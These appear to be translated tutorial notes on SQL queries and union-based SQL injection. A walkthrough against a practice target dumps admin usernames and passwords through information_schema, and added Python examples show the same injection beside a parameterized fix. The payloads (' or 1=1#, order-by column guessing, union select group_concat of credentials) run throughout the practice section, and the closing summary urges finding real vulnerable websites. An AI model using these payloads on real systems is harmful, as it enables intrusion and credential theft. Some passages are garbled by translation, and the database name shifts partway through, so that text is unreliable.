SQL query statements & injection practice (hand-written notes)


Preface

Here is a joke to start: the whole world can be injected, but it can't be injected into your heart.


(Subtext: you are not a member of the set "the whole world". Suppose you are a member of the set "humans"; humans are a subset of "the world"; you are not in "the world", so you are not in "humans", so the conclusion is that you are not human!!!)

Conditional queries

Let's take a look at the table in the environment first.


A conditional query is really just a query with a where clause added.
Here is an example.


Suppose we now want to pull out Xiao Ming (小明):

select * from hello where id=1;
or
select * from hello where name="小明";
or
select * from hello where name="小明" or id = 1;
or
select * from hello where id=1 and age=15;

Ordering results

By default, order by in SQL sorts from small to large; desc reverses that.
The default order:

select * from hello;
# compare: select * from hello order by id desc;

But that is not the point.
The point is this:

select * from hello order by 1;
select * from hello order by 3;

Look carefully at the two results: you will find that these and

select * from hello order by id;
select * from hello order by age;

are equivalent (order by 1 sorts by the first column, order by 3 by the third).
So what is this actually good for? Not just sorting, of course. During injection it is used to find out how many columns (fields) the query returns: order by n only succeeds while n is not larger than the number of columns.

Limiting results

limit x,y
x is where to start (counting from 0) and y is how many rows to take from there.
For example, limit 0,2 takes the first and second rows;
limit 1,2 takes the second and third rows, and so on.

Union queries

Let me give an example: extract the name and the age using a union query.

select name from hello union select age from hello;

This combines two different result sets into one.
Two points to note: first, the two halves of a union query can come from two different tables.
Second, the two halves must return the same number of columns, otherwise the query fails.
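The conditional, ordering, limit and union behaviour described in the sections above, run end to end. This is an added example, not code from the original notes: it uses Python's standard-library sqlite3 in place of the MySQL environment the notes use, and the contents of the `hello` table (id, name, age) are constructed, with distinct ages so that the ordering results are deterministic.

```python
import sqlite3

# Constructed sample rows modelled on the notes' `hello` table (id, name, age).
# Ages are distinct so that ordering results are deterministic.
ROWS = [
    (1, "小明", 15),
    (2, "小红", 14),
    (3, "小刚", 16),
    (4, "小李", 17),
]


def make_db() -> sqlite3.Connection:
    """Create an in-memory SQLite database holding the sample `hello` table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table hello (id integer primary key, name text, age integer)")
    conn.executemany("insert into hello values (?, ?, ?)", ROWS)
    return conn


def conditional(conn):
    """The four where clauses from the notes; each one singles out Xiao Ming."""
    by_id = conn.execute("select * from hello where id=1").fetchall()
    by_name = conn.execute("select * from hello where name='小明'").fetchall()
    either = conn.execute("select * from hello where name='小明' or id=1").fetchall()
    both = conn.execute("select * from hello where id=1 and age=15").fetchall()
    return by_id, by_name, either, both


def order_positional(conn):
    """`order by 3` sorts by the third column, exactly like `order by age`."""
    by_pos = conn.execute("select * from hello order by 3").fetchall()
    by_col = conn.execute("select * from hello order by age").fetchall()
    return by_pos == by_col, by_pos


def order_by_accepts(conn, n: int) -> bool:
    """`order by n` is only valid while n does not exceed the column count."""
    try:
        conn.execute(f"select * from hello order by {int(n)}").fetchall()
        return True
    except sqlite3.OperationalError:
        return False


def limited(conn, x: int, y: int):
    """`limit x,y`: skip x rows (counting from 0) and take the next y."""
    sql = f"select id from hello order by id limit {int(x)},{int(y)}"
    return [row[0] for row in conn.execute(sql)]


def union_rules(conn):
    """A union merges two result sets, but both halves need the same column count."""
    merged = conn.execute("select name from hello union select age from hello").fetchall()
    try:
        conn.execute("select id, name from hello union select age from hello").fetchall()
        mismatch_rejected = False
    except sqlite3.OperationalError:
        mismatch_rejected = True
    return len(merged), mismatch_rejected


if __name__ == "__main__":
    db = make_db()
    print(conditional(db)[0])                                # [(1, '小明', 15)]
    print(order_positional(db)[0])                           # True
    print(order_by_accepts(db, 3), order_by_accepts(db, 4))  # True False
    print(limited(db, 1, 2))                                 # [2, 3]
    print(union_rules(db))                                   # (8, True)
```

The `order_by_accepts` function is the mechanism behind the column-count guessing in the practice section: the database rejects `order by 4` on a three-column table, and that error is what leaks the count.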

Display misalignment

For this, we first have to know how many columns the first half of the query returns. What is that for? See the hands-on examples later on.
How to use it is easiest to see from the results.

SQL built-in functions

View the database name

select database();

View the current user

select user();

View the version

select version();
Built-in databases and tables

MySQL has a built-in database (information_schema) that stores metadata about databases, tables, and user information. This is very important: it is basically the entry point for penetration injection, i.e. getting the database's users and passwords.
The relationships between its tables, and how to query them, are shown in the practice section below.

mycli helper tool

mycli is a handy tool written in Python: it gives the MySQL command line auto-completion and prompts, which makes working in it much more convenient.

SQL injection types

There are two types: integer injection and string injection.
What is the difference between the two, or why are they split this way? It comes down to the query statement.
In a URL a very typical piece is "?id=content"; the id=1 part is combined with the back-end data access to form a query statement, for example:

https://hello.com?id=5
Suppose this is the page-switching URL; then the corresponding SQL query might be
select html_view from html_views where id = 5
(this is the integer type) or
select html_view from html_views where id = '5'
(this is the string type).
Now let's try id=1+1.

Obviously, this page treats it as a string. Logically, if it were the integer type, 1+1 would be 2 and it would return the page with id=2.

Now try to get all the data and inject. This is a low-level target, so there is no filtering and the injection goes straight through.
This is equivalent to forming the following statement:

select * from table where id='' or 1=1#';

That is just the equivalent. Also, this is not blind injection: it gives obvious feedback, a fairly basic practice target. Just enjoy it. This example mainly introduces the injection types.
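The integer-versus-string distinction and the `or 1=1` equivalence above, as an added example that is not part of the original notes: a constructed `html_views` table in Python's sqlite3 (SQLite, not the notes' MySQL), with the two concatenating query styles beside the parameterized query a defender would use instead. The one MySQL-specific detail swapped out is the comment marker: SQLite ends a line comment with `--` rather than `#`, so the payload constant below uses that.

```python
import sqlite3

# The notes' `' or 1=1#` input, written with SQLite's `--` line-comment marker.
PAYLOAD = "' or 1=1 -- "


def make_db() -> sqlite3.Connection:
    """Constructed html_views(id, html_view) table, modelled on the notes' example."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table html_views (id integer primary key, html_view text)")
    conn.executemany("insert into html_views values (?, ?)",
                     [(1, "page one"), (2, "page two"), (3, "page three")])
    return conn


def query_integer_concat(conn, raw_id: str):
    """Integer type: the URL value is spliced into the SQL text unquoted."""
    sql = f"select html_view from html_views where id = {raw_id}"
    return [row[0] for row in conn.execute(sql)]


def query_string_concat(conn, raw_id: str):
    """String type: the URL value is spliced in between quotes."""
    sql = f"select html_view from html_views where id = '{raw_id}'"
    return [row[0] for row in conn.execute(sql)]


def query_parameterized(conn, raw_id: str):
    """Hardened form: the value is bound as data, so it is never parsed as SQL."""
    sql = "select html_view from html_views where id = ?"
    return [row[0] for row in conn.execute(sql, (raw_id,))]


def probe_type(conn, query) -> str:
    """The notes' 1+1 test: integer-type code evaluates it, string-type code does not."""
    if query(conn, "1+1") == query(conn, "2"):
        return "integer"
    return "string"


if __name__ == "__main__":
    db = make_db()
    print(probe_type(db, query_integer_concat))   # integer
    print(probe_type(db, query_string_concat))    # string
    print(query_string_concat(db, PAYLOAD))       # all three rows leak
    print(query_parameterized(db, PAYLOAD))       # []
```

The parameterized version behaves like the string type under the 1+1 test (the value is never evaluated), but unlike the concatenated string type it returns nothing for the `or 1=1` input: the whole payload is compared against `id` as one literal value.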

Hands-on practice target

If it wasn't for me, if it wasn't for what it was, then whoever went to the shooting range would be close.
This is a classic example.
We get its administrator password.

Determine whether there is an injection point, and its type

Actually the id is directly the injection point, but it depends on which type it is.
For a string-type injection, you have to add a # sign to comment out the closing quote, right?

See how many fields it has

This is guessed by luck.
Try 3: no good.

Try 2: that works, so there are two columns.

Querying the database name

How to do it? Use the union query together with the database() function from earlier, which gives us the database name.

So we have it; now go after the database.

Get the table names

This is really just a lookup, but let me make it clearer here.
Do you remember the earlier statement?

union select table_name from information_schema.tables where table_schema='huterox';

Change it.
First, an introduction to the group_concat() function:
it concatenates all the values under the current field into one string, so they show up in a single row.

union select table_name from information_schema.tables where table_schema='maoshe';


We query the tables of the current database, that is, the table names stored for maoshe; we also need the values inside so we know which tables are in there.
So add it:

union select group_concat(table_name) from information_schema.tables where table_schema='maoshe'

Dump the column names

A blind guess: the table is admin, and what I want is in it.
Let's take a look at what is in the admin table.

union select 1,group_concat(column_name) from information_schema.columns where table_name='admin'#

Get the password: view the value of the password field

union select 1,group_concat(username,":",password) from maoshe.admin

Summary

1. Guess how many columns there are.
2. Once the column count is known, use the union query to do the work.
3. Know some of SQL's built-in databases, such as where the table names are kept.
4. Good luck: find a vulnerable website, other than the practice target.
The key points are:
know what the database is;
guess which table is the user table;
guess what fields are in the user table;
extract the field values.